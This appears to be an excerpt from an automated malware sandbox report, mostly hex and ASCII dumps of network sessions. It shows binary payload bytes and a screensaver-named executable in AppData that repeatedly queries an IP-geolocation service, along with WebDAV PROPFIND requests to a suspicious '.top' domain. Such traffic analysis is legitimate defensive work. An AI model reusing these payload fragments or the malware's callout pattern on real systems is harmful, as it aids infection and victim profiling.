            2024-07-05 00:57:57 UTC1369INData Raw: 0a 02 03 28 60 02 00 06 2a 3a 02 28 7d 00 00 0a 02 03 28 5f 02 00 06 2a 4a 02 28 7e 00 00 0a 03 6f 03 00 00 0a 74 53 00 00 02 2a 3a 02 28 66 02 00 06 02 03 28 6c 02 00 06 2a 22 02 03 7d e8 00 00 04 2a 1e 02 7b e9 00 00 04 2a 42 02 7b ea 00 00 04 25 2d 06 26 7e 7c 00 00 0a 2a 22 02 03 7d ea 00 00 04 2a 1e 02 7b ee 00 00 04 2a 22 02 03 7d ee 00 00 04 2a 22 02 03 7d eb 00 00 04 2a 1e 02 7b ef 00 00 04 2a 22 02 03 7d ef 00 00 04 2a 1e 02 7b f0 00 00 04 2a 76 02 20 02 50 00 00 7d ee 00 00 04 02 73 e2 00 00 06 7d f0 00 00 04 02 28 d9 01 00 06 2a 3a 02 28 7d 00 00 0a 02 03 28 7e 02 00 06 2a 3a 02 28 7d 00 00 0a 02 03 28 7d 02 00 06 2a 4a 02 28 7e 00 00 0a 03 6f 03 00 00 0a 74 56 00 00 02 2a 3a 02 28 2c 01 00 06 02 03 28 89 02 00 06 2a 4e 02 28 2c 01 00 06 02 03
            Data Ascii: (`*:(}(_*J(~otS*:(f(l*"}*{*B{%-&~|*"}*{*"}*"}*{*"}*{*v P}s}(*:(}(~*:(}(}*J(~otV*:(,(*N(,
            2024-07-05 00:57:57 UTC1369INData Raw: 7e 7c 00 00 0a 2a 1e 02 6f 00 03 00 06 2a 1e 03 28 da 00 00 0a 2a 3a 02 28 15 03 00 06 03 04 6f 5c 04 00 06 2a 3a 02 28 15 03 00 06 03 04 6f 5d 04 00 06 2a 3a 02 28 15 03 00 06 03 04 6f 5e 04 00 06 2a 36 02 28 16 03 00 06 03 6f 5f 04 00 06 2a 36 02 28 16 03 00 06 03 6f 61 04 00 06 2a 36 02 28 16 03 00 06 03 6f 62 04 00 06 2a 36 02 28 16 03 00 06 03 6f 63 04 00 06 2a 36 02 28 16 03 00 06 03 6f 64 04 00 06 2a 3e 02 28 16 03 00 06 03 04 05 6f 65 04 00 06 2a 3e 02 28 16 03 00 06 03 04 05 6f 66 04 00 06 2a 3e 02 28 16 03 00 06 03 04 05 6f 67 04 00 06 2a 3e 02 28 16 03 00 06 03 04 05 6f 68 04 00 06 2a 3e 02 28 16 03 00 06 03 04 05 6f 69 04 00 06 2a 2e 28 3c 00 00 06 73 db 00 00 0a 7a 36 02 28 17 03 00 06 03 6f 6a 04 00 06 2a 1e 02 28 dc 00 00 0a 2a 22 02 03 28
            Data Ascii: ~|*o*(*:(o\*:(o]*:(o^*6(o_*6(oa*6(ob*6(oc*6(od*>(oe*>(of*>(og*>(oh*>(oi*.(<sz6(oj*(*"(
            2024-07-05 00:57:57 UTC1369INData Raw: 06 02 03 28 b4 03 00 06 2a 6e 03 6f f2 00 00 06 6f 80 00 00 0a 16 31 0c 02 03 6f f2 00 00 06 28 b9 03 00 06 2a 52 03 28 b6 03 00 06 03 28 b7 03 00 06 02 03 28 bb 03 00 06 2a 7e 02 6f aa 01 00 06 28 67 00 00 0a 2d 11 02 72 dd 0f 00 70 02 6f aa 01 00 06 28 db 03 00 06 2a 4a 02 72 e7 0f 00 70 02 6f be 01 00 06 28 db 03 00 06 2a ae 03 6f 7f 00 00 06 28 67 00 00 0a 2d 11 03 72 dd 0f 00 70 03 6f 7f 00 00 06 28 dc 03 00 06 02 03 6f 81 00 00 06 28 dd 03 00 06 2a a6 03 72 dd 0f 00 70 03 6f 8c 02 00 06 28 dc 03 00 06 03 6f 8e 02 00 06 28 d9 03 00 06 02 03 6f 8f 02 00 06 28 b9 03 00 06 2a 36 02 03 6f 79 01 00 06 28 c8 03 00 06 2a 36 02 03 6f 3c 01 00 06 28 dd 03 00 06 2a c6 02 03 6f 4f 01 00 06 28 c7 03 00 06 02 03 6f 51 01 00 06 28 dd 03 00 06 02 03 6f 53 01 00 06
            Data Ascii: (*noo1o(*R(((*~o(g-rpo(*Jrpo(*o(g-rpo(o(*rpo(o(o(*6oy(*6o<(*oO(oQ(oS
            2024-07-05 00:57:57 UTC1369INData Raw: 01 00 04 2a 22 02 03 7d 2b 01 00 04 2a 52 02 28 03 04 00 06 2d 06 72 17 11 00 70 2a 72 23 11 00 70 2a 3a 02 28 7d 00 00 0a 02 03 28 10 04 00 06 2a 3a 02 28 7d 00 00 0a 02 03 28 0f 04 00 06 2a 4a 02 28 7e 00 00 0a 03 6f 03 00 00 0a 74 6b 00 00 02 2a 4a 02 73 f6 00 00 0a 7d 2c 01 00 04 02 28 69 00 00 0a 2a 46 02 7b 2f 01 00 04 6f f7 00 00 0a 74 0a 00 00 1b 2a 46 02 7b 30 01 00 04 6f f7 00 00 0a 74 0a 00 00 1b 2a 4a 02 7b 2d 01 00 04 28 fa 00 00 0a 14 28 fc 00 00 0a 2a 1e 02 28 23 04 00 06 2a a6 02 73 f6 00 00 0a 7d 2c 01 00 04 02 28 69 00 00 0a 02 04 7d 2d 01 00 04 02 03 25 2d 06 26 73 25 04 00 06 7d 2e 01 00 04 2a 32 02 7b 2d 01 00 04 6f 02 01 00 0a 2a 1e 02 7b 2e 01 00 04 2a 26 02 14 14 28 27 04 00 06 2a 2a 02 03 14 16 28 28 04 00 06 2a 2a 02 03 04 16 28
            Data Ascii: *"}+*R(-rp*r#p*:(}(*:(}(*J(~otk*Js},(i*F{/ot*F{0ot*J{-((*(#*s},(i}-%-&s%}.*2{-o*{.*&('**((**(


            Session IDSource IPSource PortDestination IPDestination Port
            8192.168.2.2249170188.114.97.3443
            TimestampBytes transferredDirectionData
            2024-07-05 00:58:00 UTC156OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 72 69 65 6c 6c 2e 74 6f 70 0d 0a 0d 0a
            Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: riell.top
            2024-07-05 00:58:01 UTC724INHTTP/1.1 405 Method Not Allowed
            Date: Fri, 05 Jul 2024 00:58:01 GMT
            Content-Type: text/html; charset=iso-8859-1
            Transfer-Encoding: chunked
            Connection: close
            Allow: POST,OPTIONS,HEAD,GET,TRACE
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xSWERUVAjCGNSbmOJyV2G6B1RU6CnkN0nLnMsmanedRKa5%2BDileNqeGAtefLJLA68r%2FOCrgfTVbZkPO63AbPYiitCjZUF9zeoI7hKk7zeWvLov%2Bh2fV1Fb%2BqiC4%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Strict-Transport-Security: max-age=0; includeSubDomains; preload
            X-Content-Type-Options: nosniff
            Server: cloudflare
            CF-RAY: 89e3677aed8b421b-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-05 00:58:01 UTC231INData Raw: 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
            Data Ascii: e1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
            2024-07-05 00:58:01 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            9192.168.2.2249171188.114.96.34433404C:\Users\user\AppData\Roaming\obi23456.scr
            TimestampBytes transferredDirectionData
            2024-07-05 00:58:02 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            Connection: Keep-Alive
            2024-07-05 00:58:02 UTC712INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:02 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 54908
            Last-Modified: Thu, 04 Jul 2024 09:42:54 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BxEud8xPbHVI6nKIs0Pmb9NzGN8ewUTeXOJKT1O%2BAnf8TGlsP3CW5DhR%2BUX%2BT7aRhA45lbETMjTNXKtNKzXDQaNfU2X%2BExDTnhQD0jC130h%2F4Snt0KSdSX7en4xCGw7GkSmwT6XY"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 89e367830d238c1e-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-05 00:58:02 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-05 00:58:02 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            10192.168.2.2249172188.114.96.34433404C:\Users\user\AppData\Roaming\obi23456.scr
            TimestampBytes transferredDirectionData
            2024-07-05 00:58:03 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            2024-07-05 00:58:03 UTC706INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:03 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 54909
            Last-Modified: Thu, 04 Jul 2024 09:42:54 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PkTqgIA0jZexyfZRMrNoMhZmPI4%2F349AEtNgeAwfXXrZISjT2%2BrXTA6ZcUYchGpkryGsW9F11c1pMMxP7YapNZInhlqWdhYZ3Qldpu%2BfzRpp0lRe82goPnPjYMlIfZvcdkIdzQvb"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 89e3678a9e5e429a-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-05 00:58:03 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-05 00:58:03 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination Port
            11192.168.2.2249173188.114.97.3443
            TimestampBytes transferredDirectionData
            2024-07-05 00:58:03 UTC156OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 72 69 65 6c 6c 2e 74 6f 70 0d 0a 0d 0a
            Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: riell.top
            2024-07-05 00:58:03 UTC724INHTTP/1.1 405 Method Not Allowed
            Date: Fri, 05 Jul 2024 00:58:03 GMT
            Content-Type: text/html; charset=iso-8859-1
            Transfer-Encoding: chunked
            Connection: close
            Allow: POST,OPTIONS,HEAD,GET,TRACE
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LuHH9mtq6pFLiMJPALkceIh3lBdXbbRYDVF%2FEMbJchNvHNrXZBZxX7C%2FHURNhbPfR1Exrsd6tgF4qGU4sbJDLj1ke7%2FWTwt5tYSGaZ3KEMJmlQj%2BleIeDNM9Noo%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Strict-Transport-Security: max-age=0; includeSubDomains; preload
            X-Content-Type-Options: nosniff
            Server: cloudflare
            CF-RAY: 89e3678b4cbec32a-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-05 00:58:03 UTC231INData Raw: 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
            Data Ascii: e1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
            2024-07-05 00:58:03 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            12192.168.2.2249175188.114.96.34433404C:\Users\user\AppData\Roaming\obi23456.scr
            TimestampBytes transferredDirectionData
            2024-07-05 00:58:04 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            Connection: Keep-Alive
            2024-07-05 00:58:05 UTC702INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:05 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 54911
            Last-Modified: Thu, 04 Jul 2024 09:42:54 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3986UedJhocFd0ha3owGVi2hjcWUhV8hOLon2zWLVOm%2FUBuKzCbmbKXTOlqQlR53MOnRw5yNA7tlwBzMizm8NyYVe9p7Rk8QBUKthnyKkGE9YHv2mNcGl2x4u99yD9TDsCU4N8hB"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 89e3679539db0ca1-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-05 00:58:05 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-05 00:58:05 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            13192.168.2.2249177188.114.97.34433404C:\Users\user\AppData\Roaming\obi23456.scr
            TimestampBytes transferredDirectionData
            2024-07-05 00:58:06 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            Connection: Keep-Alive
            2024-07-05 00:58:06 UTC706INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:06 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 54912
            Last-Modified: Thu, 04 Jul 2024 09:42:54 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oYEej80%2FU0n1BS9lAVCFLSGbT2ntFBKJ8%2FgW6x4moGOpi0xm3AK9%2F8OiISKEMXmyRCa0DoNIs2mAQwz7rJohonbfZ9bTiOLGezJ9ZTdvvdvmUSpwmapbN2u1iUiGgFh8SeEjgXh5"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 89e367a11e114369-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-05 00:58:06 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-05 00:58:06 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            14192.168.2.2249179188.114.96.34433404C:\Users\user\AppData\Roaming\obi23456.scr
            TimestampBytes transferredDirectionData
            2024-07-05 00:58:08 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            2024-07-05 00:58:08 UTC708INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:08 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 54914
            Last-Modified: Thu, 04 Jul 2024 09:42:54 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PwchZ5iLiS02aYR7W2Uvqanx6ABFdeOCtasoj6J9hFyLz8y0MnQNZX2gzOhJdEAl6v3eFFRXbujxlackU80v%2Bb6pJ3F%2BbGOL9J4%2BTy37l1t1uPOIxmriXVbiZp3JiE2EdDrUU%2Fkb"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 89e367a8ad754369-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-05 00:58:08 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-05 00:58:08 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            15192.168.2.2249181188.114.97.34433404C:\Users\user\AppData\Roaming\obi23456.scr
            TimestampBytes transferredDirectionData
            2024-07-05 00:58:09 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            2024-07-05 00:58:09 UTC706INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:09 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 54915
            Last-Modified: Thu, 04 Jul 2024 09:42:54 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IlZxQp4FSa30xfUodfAUaw7Gs82uRUrx%2F1hXVB0X6iT1GN2XhDYuCq5RrnyRtkbX%2FIg9Duw1J1QcfMH2Vq5ucccQHGaAoBIhk0hW2wMaI4gX3u%2FBdLl8RMqohXp2fl20tRrORZT4"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 89e367b1aadb5e6a-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-05 00:58:09 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
